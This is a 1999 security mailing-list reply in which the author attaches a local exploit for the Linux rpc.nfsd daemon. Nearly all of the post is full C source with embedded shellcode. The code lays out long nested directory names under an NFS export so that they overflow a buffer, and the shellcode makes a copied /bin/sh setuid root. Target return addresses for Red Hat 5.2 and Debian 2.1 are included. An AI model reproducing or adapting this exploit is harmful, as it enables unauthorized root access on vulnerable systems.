Re: rpc.nfsd exploit code

[tmogg () ZIGZAG PL (Mariusz Marcinkiewicz)]

Hi

On Thu, 11 Nov 1999, Crispin Cowan wrote:

> We were unable to get this sploit to actually produce a root shell on an
> unprotected nfsd.

Sorry, this version of exploit wasn't tested well. Maybe it doesn't work
in some cases.

I attached old version of rpc.nfsd exploit. This one is local only,
shellcode will make "chown root /tmp/blah; chmod +s /tmp/blah". It should
works for you.

best regards,
        tmoggie

__
Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many () rast lodz pdi net
System Administrator && Tech Support  <tmogg () zigzag pl>  http://www.zigzag.pl
Security Advisor [*] tmogg () hert org || tmogg () hack dk  [*] http://www.hert.org


/*
 * rpc.nfsd exploit for Linux
 * 
 * author: tmoggie
 * greetz: 
 *         DiGiT - bug discovering, 
 *         kil3r, maxiu and all of lam3rZ GrP
 *                                  
 */  

#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define green "\E[32m"
#define bold "\E[1m"
#define normal "\E[m"
#define red "\E[31m"

// shellcode from maxiu                                                      
// chmod 4777 /tmp/blah                                                      
char shell[] = "\xeb\x2d\x5e\xfe\x06\xfe\x46\x04\xfe\x46\x09\x31\xc9\x31\xdb"
               "\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x89\xf3\xb0\x10\xcd\x80\x66"
               "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x31\xdb\x89\xd8\xfe\xc0"
               "\xcd\x80\xe8\xce\xff\xff\xff.tmp.blah\xff\xff\xff\xff/";     

char *cmd = "cp /bin/sh /tmp/blah";

int offset;


void usage(char *prog)
 {
 printf("\nusage: %s <-e dir> [-t target] [-c command] \n",prog);
  printf("\n   -e dir    : full path to exported directory\n");
  printf("   -t target : ");
  printf("1 - RH 5.2 (default)   2 - Debian 2.1\n");
  printf("   -c command: cmd to do as a normal user" \
         " (default: cp /bin/sh /tmp/blah)\n\n");
  exit(0);
 }

void main(int argc, char **argv) 
 {
  int i,j;
  char buf[4096];
  char buf2[4096];
  char tmp[4096];

  char exp[255] = "!";
  int addr = 0xbffff667 ; // default RH 5.2 
  
  while (1)
   {
     i = getopt(argc,argv,"e:c:t:h");
     if (i == -1) break;
     switch (i) 
      {
       case 'e': strcpy(exp,optarg); break;
       case 'c': strcpy(cmd,optarg); break;
       case 't': switch (j=atoi(optarg))
                   {
                     case 1: addr = 0xbffff667; break; // debian 1.2
                     case 2: addr = 0xbffff655; break; // rh 5.2
                   }
       default : usage(argv[0]); break;
      }
   }
  if (!strcmp(exp,"!")) usage(argv[0]);
  printf(bold"cmd"); 
  if (system(cmd) != 0)
    {
      printf(red"....failed!\n"normal);
      exit(-1);
    }
  printf(normal green"\tOk\n"normal);
  
  offset = strlen(exp);
  if (exp[offset-1] != '/') strcat(exp,"/");
  offset = strlen(exp);
  bzero(buf,sizeof(buf));
  memset(tmp,'A',255);
  tmp[255]='/';
  tmp[256]='\0';
  strncpy(buf,exp,offset);
  printf(bold"dirs");
  for (i=1;i<=3;i++)    
   { 
    strncat(buf,tmp,strlen(tmp));  
    if (mkdir(buf,0777) < 0)
      {
       printf(red"...fuck! can't create directory!!! : %d\n"normal,i);
       exit(-1);
      }
   }   
  memset(tmp,'A',255);
  tmp[255-offset]='/';
  tmp[256-offset]='\0';
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal);
    exit(-1);
   } 
  memset(tmp,'\x90',255);
  strcpy(tmp+(255-strlen(shell)),shell); 
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {
    printf(red"...fuck!@# shell-dir\n"normal);
    exit(-1);
   } 
  memset(tmp,'a',255);
  tmp[97] = '\0'; 
  *((int*)(tmp+93)) = addr;
  strncat(buf,tmp,strlen(tmp));
  if (mkdir(buf,0777) < 0)
   {      
    printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal);
    exit(-1);
   } 
  printf(normal green"\tOk\n"normal);
  printf("now you have to do: "bold green \
         "rm -rf /path-to-mount-point/A[tab] & \n\n"normal);
}